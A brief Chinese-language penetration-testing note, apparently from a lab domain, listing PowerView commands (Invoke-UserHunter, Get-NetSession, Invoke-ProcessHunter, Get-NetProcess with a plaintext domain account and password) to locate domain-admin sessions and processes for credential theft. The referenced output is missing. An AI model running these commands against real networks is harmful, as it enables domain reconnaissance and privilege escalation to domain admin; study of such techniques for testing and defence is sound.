使用:Import-Module .\powerview.ps1
查看域管用户如下:
定位域管登录过哪台域机器,获取netsession:Invoke-UserHunter
获得netsession建立情况:Get-Netsession
枚举远程机器的tasklists和进程寻找目标用户:Invoke-ProcessHunter -Username sqladmin
获取远程服务器的进程用户,查看是否有域管进程,可以凭证窃取域管权限,传递远程服务器域用户(是该远程服务器的管理员):Get-NetProcess -Computer 192.168.3.68 -RemoteUserName 0day.org\sqladmin -RemotePassword admin!@#45
获取到域管进程、其他用户进程如下:
